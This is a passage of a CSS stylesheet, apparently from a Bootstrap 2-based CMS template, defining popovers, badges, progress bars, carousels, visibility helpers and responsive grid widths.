	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	white-space: normal;
}
.popover.top {
	margin-top: -10px;
}
.popover.right {
	margin-left: 10px;
}
.popover.bottom {
	margin-top: 10px;
}
.popover.left {
	margin-left: -10px;
}
.popover-title {
	margin: 0;
	padding: 8px 14px;
	font-size: 14px;
	font-weight: normal;
	line-height: 18px;
	background-color: #f7f7f7;
	border-bottom: 1px solid #ebebeb;
	-webkit-border-radius: 5px 5px 0 0;
	-moz-border-radius: 5px 5px 0 0;
	border-radius: 5px 5px 0 0;
}
.popover-title:empty {
	display: none;
}
.popover-content {
	padding: 9px 14px;
}
.popover .arrow,
.popover .arrow:after {
	position: absolute;
	display: block;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.popover .arrow {
	border-width: 11px;
}
.popover .arrow:after {
	border-width: 10px;
	content: "";
}
.popover.top .arrow {
	left: 50%;
	margin-left: -11px;
	border-bottom-width: 0;
	border-top-color: #999;
	border-top-color: rgba(0,0,0,0.25);
	bottom: -11px;
}
.popover.top .arrow:after {
	bottom: 1px;
	margin-left: -10px;
	border-bottom-width: 0;
	border-top-color: #fff;
}
.popover.right .arrow {
	top: 50%;
	left: -11px;
	margin-top: -11px;
	border-left-width: 0;
	border-right-color: #999;
	border-right-color: rgba(0,0,0,0.25);
}
.popover.right .arrow:after {
	left: 1px;
	bottom: -10px;
	border-left-width: 0;
	border-right-color: #fff;
}
.popover.bottom .arrow {
	left: 50%;
	margin-left: -11px;
	border-top-width: 0;
	border-bottom-color: #999;
	border-bottom-color: rgba(0,0,0,0.25);
	top: -11px;
}
.popover.bottom .arrow:after {
	top: 1px;
	margin-left: -10px;
	border-top-width: 0;
	border-bottom-color: #fff;
}
.popover.left .arrow {
	top: 50%;
	right: -11px;
	margin-top: -11px;
	border-right-width: 0;
	border-left-color: #999;
	border-left-color: rgba(0,0,0,0.25);
}
.popover.left .arrow:after {
	right: 1px;
	border-right-width: 0;
	border-left-color: #fff;
	bottom: -10px;
}
.thumbnails {
	margin-left: -20px;
	list-style: none;
	*zoom: 1;
}
.thumbnails:before,
.thumbnails:after {
	display: table;
	content: "";
	line-height: 0;
}
.thumbnails:after {
	clear: both;
}
.row-fluid .thumbnails {
	margin-left: 0;
}
.thumbnails > li {
	float: left;
	margin-bottom: 18px;
	margin-left: 20px;
}
.thumbnail {
	display: block;
	padding: 4px;
	line-height: 18px;
	border: 1px solid #ddd;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.055);
	-moz-box-shadow: 0 1px 3px rgba(0,0,0,0.055);
	box-shadow: 0 1px 3px rgba(0,0,0,0.055);
	-webkit-transition: all .2s ease-in-out;
	-moz-transition: all .2s ease-in-out;
	-o-transition: all .2s ease-in-out;
	transition: all .2s ease-in-out;
}
a.thumbnail:hover,
a.thumbnail:focus {
	border-color: #005e8d;
	-webkit-box-shadow: 0 1px 4px rgba(0,105,214,0.25);
	-moz-box-shadow: 0 1px 4px rgba(0,105,214,0.25);
	box-shadow: 0 1px 4px rgba(0,105,214,0.25);
}
.thumbnail > img {
	display: block;
	max-width: 100%;
	margin-left: auto;
	margin-right: auto;
}
.thumbnail .caption {
	padding: 9px;
	color: #555;
}
.label,
.badge {
	display: inline-block;
	padding: 2px 4px;
	font-size: 10.998px;
	font-weight: bold;
	line-height: 14px;
	color: #fff;
	vertical-align: baseline;
	white-space: nowrap;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #999;
}
.label {
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.badge {
	padding-left: 9px;
	padding-right: 9px;
	-webkit-border-radius: 9px;
	-moz-border-radius: 9px;
	border-radius: 9px;
}
.label:empty,
.badge:empty {
	display: none;
}
a.label:hover,
a.label:focus,
a.badge:hover,
a.badge:focus {
	color: #fff;
	text-decoration: none;
	cursor: pointer;
}
.label-important,
.badge-important {
	background-color: #b94a48;
}
.label-important[href],
.badge-important[href] {
	background-color: #953b39;
}
.label-warning,
.badge-warning {
	background-color: #f89406;
}
.label-warning[href],
.badge-warning[href] {
	background-color: #c67605;
}
.label-success,
.badge-success {
	background-color: #468847;
}
.label-success[href],
.badge-success[href] {
	background-color: #356635;
}
.label-info,
.badge-info {
	background-color: #3a87ad;
}
.label-info[href],
.badge-info[href] {
	background-color: #2d6987;
}
.label-inverse,
.badge-inverse {
	background-color: #333;
}
.label-inverse[href],
.badge-inverse[href] {
	background-color: #1a1a1a;
}
.btn .label,
.btn .badge {
	position: relative;
	top: -1px;
}
.btn-mini .label,
.btn-mini .badge {
	top: 0;
}
@-webkit-keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
@-moz-keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
@-ms-keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
@-o-keyframes progress-bar-stripes {
	from {
		background-position: 0 0;
	}
	to {
		background-position: 40px 0;
	}
}
@keyframes progress-bar-stripes {
	from {
		background-position: 40px 0;
	}
	to {
		background-position: 0 0;
	}
}
.progress {
	overflow: hidden;
	height: 18px;
	margin-bottom: 18px;
	background-color: #f7f7f7;
	background-image: -moz-linear-gradient(top,#f5f5f5,#f9f9f9);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#f5f5f5),to(#f9f9f9));
	background-image: -webkit-linear-gradient(top,#f5f5f5,#f9f9f9);
	background-image: -o-linear-gradient(top,#f5f5f5,#f9f9f9);
	background-image: linear-gradient(to bottom,#f5f5f5,#f9f9f9);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#fff9f9f9', GradientType=0);
	-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
	-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
	box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.progress .bar {
	width: 0%;
	height: 100%;
	color: #fff;
	float: left;
	font-size: 12px;
	text-align: center;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #0e90d2;
	background-image: -moz-linear-gradient(top,#149bdf,#0480be);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#149bdf),to(#0480be));
	background-image: -webkit-linear-gradient(top,#149bdf,#0480be);
	background-image: -o-linear-gradient(top,#149bdf,#0480be);
	background-image: linear-gradient(to bottom,#149bdf,#0480be);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff149bdf', endColorstr='#ff0480be', GradientType=0);
	-webkit-box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
	-moz-box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
	box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	-webkit-transition: width .6s ease;
	-moz-transition: width .6s ease;
	-o-transition: width .6s ease;
	transition: width .6s ease;
}
.progress .bar + .bar {
	-webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15);
	-moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15);
	box-shadow: inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15);
}
.progress-striped .bar {
	background-color: #149bdf;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	-webkit-background-size: 40px 40px;
	-moz-background-size: 40px 40px;
	-o-background-size: 40px 40px;
	background-size: 40px 40px;
}
.progress.active .bar {
	-webkit-animation: progress-bar-stripes 2s linear infinite;
	-moz-animation: progress-bar-stripes 2s linear infinite;
	-ms-animation: progress-bar-stripes 2s linear infinite;
	-o-animation: progress-bar-stripes 2s linear infinite;
	animation: progress-bar-stripes 2s linear infinite;
}
.progress-danger .bar,
.progress .bar-danger {
	background-color: #dd514c;
	background-image: -moz-linear-gradient(top,#ee5f5b,#c43c35);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#ee5f5b),to(#c43c35));
	background-image: -webkit-linear-gradient(top,#ee5f5b,#c43c35);
	background-image: -o-linear-gradient(top,#ee5f5b,#c43c35);
	background-image: linear-gradient(to bottom,#ee5f5b,#c43c35);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b', endColorstr='#ffc43c35', GradientType=0);
}
.progress-danger.progress-striped .bar,
.progress-striped .bar-danger {
	background-color: #ee5f5b;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.progress-success .bar,
.progress .bar-success {
	background-color: #5eb95e;
	background-image: -moz-linear-gradient(top,#62c462,#57a957);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#62c462),to(#57a957));
	background-image: -webkit-linear-gradient(top,#62c462,#57a957);
	background-image: -o-linear-gradient(top,#62c462,#57a957);
	background-image: linear-gradient(to bottom,#62c462,#57a957);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff62c462', endColorstr='#ff57a957', GradientType=0);
}
.progress-success.progress-striped .bar,
.progress-striped .bar-success {
	background-color: #62c462;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.progress-info .bar,
.progress .bar-info {
	background-color: #4bb1cf;
	background-image: -moz-linear-gradient(top,#5bc0de,#339bb9);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#5bc0de),to(#339bb9));
	background-image: -webkit-linear-gradient(top,#5bc0de,#339bb9);
	background-image: -o-linear-gradient(top,#5bc0de,#339bb9);
	background-image: linear-gradient(to bottom,#5bc0de,#339bb9);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff339bb9', GradientType=0);
}
.progress-info.progress-striped .bar,
.progress-striped .bar-info {
	background-color: #5bc0de;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.progress-warning .bar,
.progress .bar-warning {
	background-color: #faa732;
	background-image: -moz-linear-gradient(top,#fbb450,#f89406);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#fbb450),to(#f89406));
	background-image: -webkit-linear-gradient(top,#fbb450,#f89406);
	background-image: -o-linear-gradient(top,#fbb450,#f89406);
	background-image: linear-gradient(to bottom,#fbb450,#f89406);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffab44f', endColorstr='#fff89406', GradientType=0);
}
.progress-warning.progress-striped .bar,
.progress-striped .bar-warning {
	background-color: #fbb450;
	background-image: -webkit-gradient(linear,0 100%,100% 0,color-stop(.25,rgba(255,255,255,0.15)),color-stop(.25,transparent),color-stop(.5,transparent),color-stop(.5,rgba(255,255,255,0.15)),color-stop(.75,rgba(255,255,255,0.15)),color-stop(.75,transparent),to(transparent));
	background-image: -webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: -o-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
	background-image: linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);
}
.accordion {
	margin-bottom: 18px;
}
.accordion-group {
	margin-bottom: 2px;
	border: 1px solid #e5e5e5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.accordion-heading {
	border-bottom: 0;
}
.accordion-heading .accordion-toggle {
	display: block;
	padding: 8px 15px;
}
.accordion-toggle {
	cursor: pointer;
}
.accordion-inner {
	padding: 9px 15px;
	border-top: 1px solid #e5e5e5;
}
.carousel {
	position: relative;
	margin-bottom: 18px;
	line-height: 1;
}
.carousel-inner {
	overflow: hidden;
	width: 100%;
	position: relative;
}
.carousel-inner > .item {
	display: none;
	position: relative;
	-webkit-transition: .6s ease-in-out left;
	-moz-transition: .6s ease-in-out left;
	-o-transition: .6s ease-in-out left;
	transition: .6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
	display: block;
	line-height: 1;
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
	display: block;
}
.carousel-inner > .active {
	left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
	position: absolute;
	top: 0;
	width: 100%;
}
.carousel-inner > .next {
	left: 100%;
}
.carousel-inner > .prev {
	left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
	left: 0;
}
.carousel-inner > .active.left {
	left: -100%;
}
.carousel-inner > .active.right {
	left: 100%;
}
.carousel-control {
	position: absolute;
	top: 40%;
	left: 15px;
	width: 40px;
	height: 40px;
	margin-top: -20px;
	font-size: 60px;
	font-weight: 100;
	line-height: 30px;
	color: #fff;
	text-align: center;
	background: #222;
	border: 3px solid #fff;
	-webkit-border-radius: 23px;
	-moz-border-radius: 23px;
	border-radius: 23px;
	opacity: 0.5;
	filter: alpha(opacity=50);
}
.carousel-control.right {
	left: auto;
	right: 15px;
}
.carousel-control:hover,
.carousel-control:focus {
	color: #fff;
	text-decoration: none;
	opacity: 0.9;
	filter: alpha(opacity=90);
}
.carousel-indicators {
	position: absolute;
	top: 15px;
	right: 15px;
	z-index: 5;
	margin: 0;
	list-style: none;
}
.carousel-indicators li {
	display: block;
	float: left;
	width: 10px;
	height: 10px;
	margin-left: 5px;
	text-indent: -999px;
	background-color: #ccc;
	background-color: rgba(255,255,255,0.25);
	border-radius: 5px;
}
.carousel-indicators .active {
	background-color: #fff;
}
.carousel-caption {
	position: absolute;
	left: 0;
	right: 0;
	bottom: 0;
	padding: 15px;
	background: #333;
	background: rgba(0,0,0,0.75);
}
.carousel-caption h4,
.carousel-caption p {
	color: #fff;
	line-height: 18px;
}
.carousel-caption h4 {
	margin: 0 0 5px;
}
.carousel-caption p {
	margin-bottom: 0;
}
.hero-unit {
	padding: 60px;
	margin-bottom: 30px;
	font-size: 18px;
	font-weight: 200;
	line-height: 27px;
	color: inherit;
	background-color: #eee;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.hero-unit h1 {
	margin-bottom: 0;
	font-size: 60px;
	line-height: 1;
	color: inherit;
	letter-spacing: -1px;
}
.hero-unit li {
	line-height: 27px;
}
.pull-right {
	float: right;
}
.pull-left {
	float: left;
}
.hide {
	display: none;
}
.show {
	display: block;
}
.invisible {
	visibility: hidden;
}
.affix {
	position: fixed;
}
@-ms-viewport {
	width: device-width;
}
.hidden {
	display: none;
	visibility: hidden;
}
.visible-phone {
	display: none !important;
}
.visible-tablet {
	display: none !important;
}
.hidden-desktop {
	display: none !important;
}
.visible-desktop {
	display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
	.hidden-desktop {
		display: inherit !important;
	}
	.visible-desktop {
		display: none !important;
	}
	.visible-tablet {
		display: inherit !important;
	}
	.hidden-tablet {
		display: none !important;
	}
}
@media (max-width: 767px) {
	.hidden-desktop {
		display: inherit !important;
	}
	.visible-desktop {
		display: none !important;
	}
	.visible-phone {
		display: inherit !important;
	}
	.hidden-phone {
		display: none !important;
	}
}
.visible-print {
	display: none !important;
}
@media print {
	.visible-print {
		display: inherit !important;
	}
	.hidden-print {
		display: none !important;
	}
}
@media (max-width: 767px) {
	body {
		padding-left: 20px;
		padding-right: 20px;
	}
	.navbar-fixed-top,
	.navbar-fixed-bottom,
	.navbar-static-top {
		margin-left: -20px;
		margin-right: -20px;
	}
	.container-fluid {
		padding: 0;
	}
	.dl-horizontal dt {
		float: none;
		clear: none;
		width: auto;
		text-align: left;
	}
	.dl-horizontal dd {
		margin-left: 0;
	}
	.dropdown-menu .menuitem-group {
		background-color: #10223e;
		color: #eee;
	}
	.container {
		width: auto;
	}
	.row-fluid {
		width: 100%;
	}
	.row,
	.thumbnails {
		margin-left: 0;
	}
	.thumbnails > li {
		float: none;
		margin-left: 0;
	}
	[class*="span"],
	.uneditable-input[class*="span"],
	.row-fluid [class*="span"] {
		float: none;
		display: block;
		width: 100%;
		margin-left: 0;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}
	.span12,
	.row-fluid .span12 {
		width: 100%;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}
	.row-fluid [class*="offset"]:first-child {
		margin-left: 0;
	}
	.input-large,
	.input-xlarge,
	.input-xxlarge,
	input[class*="span"],
	select[class*="span"],
	textarea[class*="span"],
	.uneditable-input {
		display: block;
		width: 100%;
		min-height: 28px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}
	.input-prepend input,
	.input-append input,
	.input-prepend input[class*="span"],
	.input-append input[class*="span"] {
		display: inline-block;
	}
	.controls-row [class*="span"] + [class*="span"] {
		margin-left: 0;
	}
}
@media (max-width: 480px) {
	.nav-collapse {
		-webkit-transform: translate3d(0,0,0);
	}
	.page-header h1 small {
		display: block;
		line-height: 18px;
	}
	input[type="checkbox"],
	input[type="radio"] {
		border: 1px solid #ccc;
	}
	.form-horizontal .control-label {
		float: none;
		width: auto;
		padding-top: 0;
		text-align: left;
	}
	.form-horizontal .controls {
		margin-left: 0;
	}
	.form-horizontal .control-list {
		padding-top: 0;
	}
	.form-horizontal .form-actions {
		padding-left: 10px;
		padding-right: 10px;
	}
	.tag-category input#filter-search,
	.newsfeed-category input#filter-search {
		width: auto;
		margin-bottom: 9px;
	}
	.category-list input#filter-search {
		width: auto;
	}
	.media .pull-left,
	.media .pull-right {
		float: none;
		display: block;
		margin-bottom: 10px;
	}
	.media-object {
		margin-right: 0;
		margin-left: 0;
	}
	.modal-header .close {
		padding: 10px;
		margin: -10px;
	}
	.carousel-caption {
		position: static;
	}
}
@media (min-width: 768px) and (max-width: 979px) {
	.row {
		margin-left: -20px;
		*zoom: 1;
	}
	.row:before,
	.row:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row:after {
		clear: both;
	}
	[class*="span"] {
		float: left;
		min-height: 1px;
		margin-left: 20px;
	}
	.container,
	.navbar-static-top .container,
	.navbar-fixed-top .container,
	.navbar-fixed-bottom .container {
		width: 724px;
	}
	.span12 {
		width: 724px;
	}
	.span11 {
		width: 662px;
	}
	.span10 {
		width: 600px;
	}
	.span9 {
		width: 538px;
	}
	.span8 {
		width: 476px;
	}
	.span7 {
		width: 414px;
	}
	.span6 {
		width: 352px;
	}
	.span5 {
		width: 290px;
	}
	.span4 {
		width: 228px;
	}
	.span3 {
		width: 166px;
	}
	.span2 {
		width: 104px;
	}
	.span1 {
		width: 42px;
	}
	.offset12 {
		margin-left: 764px;
	}
	.offset11 {
		margin-left: 702px;
	}
	.offset10 {
		margin-left: 640px;
	}
	.offset9 {
		margin-left: 578px;
	}
	.offset8 {
		margin-left: 516px;
	}
	.offset7 {
		margin-left: 454px;
	}
	.offset6 {
		margin-left: 392px;
	}
	.offset5 {
		margin-left: 330px;
	}
	.offset4 {
		margin-left: 268px;
	}
	.offset3 {
		margin-left: 206px;
	}
	.offset2 {
		margin-left: 144px;
	}
	.offset1 {
		margin-left: 82px;
	}
	.row-fluid {
		width: 100%;
		*zoom: 1;
	}
	.row-fluid:before,
	.row-fluid:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row-fluid:after {
		clear: both;
	}
	.row-fluid [class*="span"] {
		display: block;
		width: 100%;
		min-height: 28px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
		float: left;
		margin-left: 2.127659574%;
		*margin-left: 2.0744680846383%;
	}
	.row-fluid [class*="span"]:first-child {
		margin-left: 0;
	}
	.row-fluid .controls-row [class*="span"] + [class*="span"] {
		margin-left: 2.127659574%;
	}
	.row-fluid .span12 {
		width: 99.99999999%;
		*width: 99.946808500638%;
	}
	.row-fluid .span11 {
		width: 91.489361693%;
		*width: 91.436170203638%;
	}
	.row-fluid .span10 {
		width: 82.978723396%;
		*width: 82.925531906638%;
	}
	.row-fluid .span9 {
		width: 74.468085099%;
		*width: 74.414893609638%;
	}
	.row-fluid .span8 {
		width: 65.957446802%;
		*width: 65.904255312638%;
	}
	.row-fluid .span7 {
		width: 57.446808505%;
		*width: 57.393617015638%;
	}
	.row-fluid .span6 {
		width: 48.936170208%;
		*width: 48.882978718638%;
	}
	.row-fluid .span5 {
		width: 40.425531911%;
		*width: 40.372340421638%;
	}
	.row-fluid .span4 {
		width: 31.914893614%;
		*width: 31.861702124638%;
	}
	.row-fluid .span3 {
		width: 23.404255317%;
		*width: 23.351063827638%;
	}
	.row-fluid .span2 {
		width: 14.89361702%;
		*width: 14.840425530638%;
	}
	.row-fluid .span1 {
		width: 6.382978723%;
		*width: 6.3297872336383%;
	}
	.row-fluid .offset12 {
		margin-left: 104.255319138%;
		*margin-left: 104.14893615928%;
	}
	.row-fluid .offset12:first-child {
		margin-left: 102.127659564%;
		*margin-left: 102.02127658528%;
	}
	.row-fluid .offset11 {
		margin-left: 95.744680841%;
		*margin-left: 95.638297862277%;
	}
	.row-fluid .offset11:first-child {
		margin-left: 93.617021267%;
		*margin-left: 93.510638288277%;
	}
	.row-fluid .offset10 {
		margin-left: 87.234042544%;
		*margin-left: 87.127659565277%;
	}
	.row-fluid .offset10:first-child {
		margin-left: 85.10638297%;
		*margin-left: 84.999999991277%;
	}
	.row-fluid .offset9 {
		margin-left: 78.723404247%;
		*margin-left: 78.617021268277%;
	}
	.row-fluid .offset9:first-child {
		margin-left: 76.595744673%;
		*margin-left: 76.489361694277%;
	}
	.row-fluid .offset8 {
		margin-left: 70.21276595%;
		*margin-left: 70.106382971277%;
	}
	.row-fluid .offset8:first-child {
		margin-left: 68.085106376%;
		*margin-left: 67.978723397277%;
	}
	.row-fluid .offset7 {
		margin-left: 61.702127653%;
		*margin-left: 61.595744674277%;
	}
	.row-fluid .offset7:first-child {
		margin-left: 59.574468079%;
		*margin-left: 59.468085100277%;
	}
	.row-fluid .offset6 {
		margin-left: 53.191489356%;
		*margin-left: 53.085106377277%;
	}
	.row-fluid .offset6:first-child {
		margin-left: 51.063829782%;
		*margin-left: 50.957446803277%;
	}
	.row-fluid .offset5 {
		margin-left: 44.680851059%;
		*margin-left: 44.574468080277%;
	}
	.row-fluid .offset5:first-child {
		margin-left: 42.553191485%;
		*margin-left: 42.446808506277%;
	}
	.row-fluid .offset4 {
		margin-left: 36.170212762%;
		*margin-left: 36.063829783277%;
	}
	.row-fluid .offset4:first-child {
		margin-left: 34.042553188%;
		*margin-left: 33.936170209277%;
	}
	.row-fluid .offset3 {
		margin-left: 27.659574465%;
		*margin-left: 27.553191486277%;
	}
	.row-fluid .offset3:first-child {
		margin-left: 25.531914891%;
		*margin-left: 25.425531912277%;
	}
	.row-fluid .offset2 {
		margin-left: 19.148936168%;
		*margin-left: 19.042553189277%;
	}
	.row-fluid .offset2:first-child {
		margin-left: 17.021276594%;
		*margin-left: 16.914893615277%;
	}
	.row-fluid .offset1 {
		margin-left: 10.638297871%;
		*margin-left: 10.531914892277%;
	}
	.row-fluid .offset1:first-child {
		margin-left: 8.510638297%;
		*margin-left: 8.4042553182766%;
	}
	input,
	textarea,
	.uneditable-input {
		margin-left: 0;
	}
	.controls-row [class*="span"] + [class*="span"] {
		margin-left: 20px;
	}
	input.span12,
	textarea.span12,
	.uneditable-input.span12 {
		width: 710px;
	}
	input.span11,
	textarea.span11,
	.uneditable-input.span11 {
		width: 648px;
	}
	input.span10,
	textarea.span10,
	.uneditable-input.span10 {
		width: 586px;
	}
	input.span9,
	textarea.span9,
	.uneditable-input.span9 {
		width: 524px;
	}
	input.span8,
	textarea.span8,
	.uneditable-input.span8 {
		width: 462px;
	}
	input.span7,
	textarea.span7,
	.uneditable-input.span7 {
		width: 400px;
	}
	input.span6,
	textarea.span6,
	.uneditable-input.span6 {
		width: 338px;
	}
	input.span5,
	textarea.span5,
	.uneditable-input.span5 {
		width: 276px;
	}
	input.span4,
	textarea.span4,
	.uneditable-input.span4 {
		width: 214px;
	}
	input.span3,
	textarea.span3,
	.uneditable-input.span3 {
		width: 152px;
	}
	input.span2,
	textarea.span2,
	.uneditable-input.span2 {
		width: 90px;
	}
	input.span1,
	textarea.span1,
	.uneditable-input.span1 {
		width: 28px;
	}
}
@media (min-width: 1200px) {
	.row {
		margin-left: -20px;
		*zoom: 1;
	}
	.row:before,
	.row:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row:after {
		clear: both;
	}
	[class*="span"] {
		float: left;
		min-height: 1px;
		margin-left: 20px;
	}
	.container,
	.navbar-static-top .container,
	.navbar-fixed-top .container,
	.navbar-fixed-bottom .container {
		width: 940px;
	}
	.span12 {
		width: 940px;
	}
	.span11 {
		width: 860px;
	}
	.span10 {
		width: 780px;
	}
	.span9 {
		width: 700px;
	}
	.span8 {
		width: 620px;
	}
	.span7 {
		width: 540px;
	}
	.span6 {
		width: 460px;
	}
	.span5 {
